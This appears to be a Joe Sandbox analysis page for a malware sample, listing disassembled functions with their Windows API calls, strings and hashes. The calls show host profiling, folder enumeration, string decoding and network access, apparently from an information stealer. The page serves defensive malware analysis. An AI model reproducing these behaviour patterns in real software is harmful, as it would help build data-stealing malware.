Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

Function 00404AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800,009081B0), ref: 00404B17
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
InternetCrackUrlA.WININET(?,00000000), ref: 00404B47

Strings

<, xrefs: 00404B07

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

Function 004228B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
HeapAlloc.KERNEL32(00000000), ref: 004228CC
RegOpenKeyExA.KERNEL32(80000002,0090B7E8,00000000,00020119,00422849), ref: 004228EB
RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
RegCloseKey.ADVAPI32(00422849), ref: 0042290F

Strings

CurrentBuildNumber, xrefs: 004228FF

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

Function 00422820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
HeapAlloc.KERNEL32(00000000), ref: 0042283C

Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,0090B7E8,00000000,00020119,00422849), ref: 004228EB
Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F

RegOpenKeyExA.KERNEL32(80000002,0090B7E8,00000000,00020119,?), ref: 00422871
RegQueryValueExA.KERNEL32(?,0090EE70,00000000,00000000,00000000,000000FF), ref: 0042288C
RegCloseKey.ADVAPI32(?), ref: 00422896

Strings

Windows 11, xrefs: 00422850

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4

Function 0041EFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F013
StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F

Strings

ERROR, xrefs: 0041F028, 0041F089

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798

Function 00422A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1

Function 008EB156 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008EB17E
Module32First.KERNEL32(00000000,00000224), ref: 008EB19E

Memory Dump Source

Source File: 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8ea000_4CC1.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 49f2d894f3e24cc0c95550e5c1e57c4ba672943aef96591b77d81c542e26f827
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 4CF06235200755AFD7203AFAA89DB6F76E8FF4A775F100528E642D20C0DB70E8458A61

Function 02450E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02450223,?,?), ref: 02450E19
SetErrorMode.KERNEL32(00000000,?,?,02450223,?,?), ref: 02450E1E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e1b12fe88f2fad782c68d0e31ab567b73fc92b09f825ff25b4754dc4cb9b2f3f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 0CD0123514512877D7002A94DC09BCE7B1CDF09B66F108011FB0DD9181C770954046E5

Function 0041EF30 Relevance: 1.3, APIs: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795

Function 008EAE15 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008EAE66

Memory Dump Source

Source File: 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8ea000_4CC1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8e24da81e955117f9fb1d2fc138c7e4f50e39daa5ce07f4eb8232bec30478bc7
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: FD113C79A00208EFDB01DF99C985E99BBF5EF08750F058094F948AB362D371EA50DF81

Non-executed Functions

Function 02467047 Relevance: 147.8, APIs: 83, Strings: 1, Instructions: 752stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246707C
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024670AF
lstrcpy.KERNEL32(00000000,00000000), ref: 024670E9
lstrcpy.KERNEL32(00000000,00000000), ref: 02467110
lstrcat.KERNEL32(00000000,00000000), ref: 0246711B
lstrcpy.KERNEL32(00000000,00000000), ref: 02467144
lstrlen.KERNEL32(00435320), ref: 0246715E
lstrcpy.KERNEL32(00000000,00000000), ref: 02467180
lstrcat.KERNEL32(00000000,00435320), ref: 0246718C
lstrcpy.KERNEL32(00000000,00000000), ref: 024671B7
lstrcpy.KERNEL32(00000000,00000000), ref: 024671E7
LocalAlloc.KERNEL32(00000040,?), ref: 0246721C
strtok_s.MSVCRT ref: 02467249
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02467284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024672B4

Strings

hSC, xrefs: 02467651, 02467654, 024676CD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
String ID: hSC
API String ID: 922491270-3351665975
Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction ID: 99933459bdb48f37faa61a9c18f6309659e82479d067ea1f786010e6b7806746
Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction Fuzzy Hash: FF427F70A00625ABDB21EF75CC8CAAFBBB6EF44708F14541AEC05A7251DBB4D901DFA1

Function 02456267 Relevance: 128.6, APIs: 68, Strings: 5, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02456296
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024562E9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0245631C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0245634C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02456387
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024563BA
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 024563CA

Strings

TPC, xrefs: 024567D2
------, xrefs: 024564F0, 0245651D, 02456795, 02456886
TPC, xrefs: 024568C0
", xrefs: 0245682E, 0245691C
TPC, xrefs: 02456868

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction ID: 262a881e4ada950058f3c0111cd74b75091e9fe4bccbf74103d4167d93892786
Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction Fuzzy Hash: 7C5281719006299FDB20EF75DC84AAEB7BAAF44308F55442AFC55AB252DB74DC01CFA0

Function 02454DE7 Relevance: 116.3, APIs: 61, Strings: 5, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02454E16
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02454E69
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02454E9C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02454ECC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02454F0A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02454F3D
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02454F4D

Strings

TPC, xrefs: 0245544D
TPC, xrefs: 0245535F
------, xrefs: 02455073, 024550A0, 02455322, 02455413
TPC, xrefs: 024553F5
", xrefs: 024553BB, 024554A9

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: fc918d25f8641a10a775b0c0162546dc86047189a09e5eab3f081bd063b908de
Instruction ID: e59a5b206dc89476a876623ae2ec95b18e86011349b547eaf068ed4c6e083bdc
Opcode Fuzzy Hash: fc918d25f8641a10a775b0c0162546dc86047189a09e5eab3f081bd063b908de
Instruction Fuzzy Hash: A25294719006699FDB21EF75CC84BAEBBB6AF44308F14442AEC45AB252DB74DD41CFA0

Function 02467260 Relevance: 114.3, APIs: 64, Strings: 1, Instructions: 526stringmemoryencryptionCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02467284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024672B4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024672E4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02467316
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02467323
RtlAllocateHeap.NTDLL(00000000), ref: 0246732A
StrStrA.SHLWAPI(00000000,00435350), ref: 02467341
lstrlen.KERNEL32(00000000), ref: 0246734C
malloc.MSVCRT ref: 02467356
strncpy.MSVCRT ref: 02467364
lstrcpy.KERNEL32(00000000,00000000), ref: 0246738F
lstrcpy.KERNEL32(00000000,00000000), ref: 024673B6
StrStrA.SHLWAPI(00000000,00435358), ref: 024673C9
lstrlen.KERNEL32(00000000), ref: 024673D4
malloc.MSVCRT ref: 024673DE
strncpy.MSVCRT ref: 024673EC
lstrcpy.KERNEL32(00000000,00000000), ref: 02467417
lstrcpy.KERNEL32(00000000,00000000), ref: 0246743E
StrStrA.SHLWAPI(00000000,00435360), ref: 02467451
lstrlen.KERNEL32(00000000), ref: 0246745C
malloc.MSVCRT ref: 02467466
strncpy.MSVCRT ref: 02467474
lstrcpy.KERNEL32(00000000,00000000), ref: 0246749F
lstrcpy.KERNEL32(00000000,00000000), ref: 024674C6
StrStrA.SHLWAPI(00000000,00435368), ref: 024674D9
lstrlen.KERNEL32(00000000), ref: 024674E8
malloc.MSVCRT ref: 024674F2
strncpy.MSVCRT ref: 02467500
lstrcpy.KERNEL32(00000000,00000000), ref: 02467530
lstrcpy.KERNEL32(00000000,00000000), ref: 02467558
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0246757B
LocalAlloc.KERNEL32(00000040,00000000), ref: 0246758F
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024675B0
LocalFree.KERNEL32(00000000), ref: 024675BB
lstrlen.KERNEL32(?), ref: 02467655
lstrlen.KERNEL32(?), ref: 02467668
lstrlen.KERNEL32(?), ref: 0246767B

Strings

hSC, xrefs: 02467651, 02467654, 024676CD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
String ID: hSC
API String ID: 2413810636-3351665975
